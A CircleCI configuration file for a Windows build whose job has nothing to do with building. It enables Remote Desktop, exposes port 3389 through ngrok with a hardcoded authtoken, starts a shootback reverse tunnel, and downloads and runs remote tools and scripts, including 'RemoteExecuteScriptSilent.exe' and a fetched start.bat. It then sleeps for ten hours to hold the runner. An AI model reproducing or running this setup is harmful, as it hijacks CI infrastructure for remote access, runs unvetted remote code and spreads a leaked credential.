version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
    steps:
      - run:
          name: "Step1"
          command: |
            Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
            Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
            Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1

      - run:
          name: "Setup rclone"
          command: |
            Invoke-WebRequest https://gitlab.com/real_madrid/gh-rdp/-/raw/master/rclone.zip -OutFile C:\rclone.zip
            Expand-Archive C:\rclone.zip -DestinationPath C:\rclone
            Start-Process Powershell -ArgumentList '-Noexit -Command "C:\rclone\rclone config --config=\"C:\rclone\rclone.conf\""'

      - run:
          name: "Setup ngrok"
          command: |
            Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
            Expand-Archive ngrok.zip
            # Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe authtoken 1fUChJ9f0IbdlyQxrQYgVNTV73M_7sGWkr36BGkDfU3M6hURy"'
            .\ngrok\ngrok.exe authtoken 1fUChJ9f0IbdlyQxrQYgVNTV73M_7sGWkr36BGkDfU3M6hURy
            Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp --region ap 3389"'

      # - run:
      #     name: "Download app"
      #     command: |
      #       C:\rclone\rclone copy dev:bas/bigfi.zip C:\bas
      #       Expand-Archive C:\bas\bigfi.zip -DestinationPath C:\Users\root\AppData\Local\bas

      - run:
          name: "Download tool"
          command: |
            C:\rclone\rclone copy dev:bas/bigvp.zip C:\bas
            Expand-Archive C:\bas\bigvp.zip -DestinationPath C:\Users\root\AppData\Local\bas

      # - run:
      #     name: "Run tool"
      #     command: |
      #       Start-Process Powershell -ArgumentList '-Noexit -Command "C:\Users\root\AppData\Local\bas\bigfi\RemoteExecuteScriptSilent.exe"'
      
      - run:
          name: "Run tool"
          command: |
            Start-Process Powershell -ArgumentList '-Noexit -Command "C:\Users\root\AppData\Local\bas\bigvp\RemoteExecuteScriptSilent.exe"'

      - run:
          name: "Setup shootback"
          command: |
            cd C:\ ; git clone https://github.com/aploium/shootback
            C:\rclone\rclone copy dev:bas/shootback.exe C:\bas
            Start-Process Powershell -ArgumentList '-Noexit -Command "C:\bas\shootback.exe"'

      - run:
          name: "Step3"
          command: |
            Invoke-WebRequest https://gitlab.com/real_madrid/gh-rdp/-/raw/master/start2.sh -OutFile start.bat
            cmd /c start.bat
            
      - run:
          name: "Sleeping"
          command: |
            Start-Sleep -s 99999
          no_output_timeout: 10h


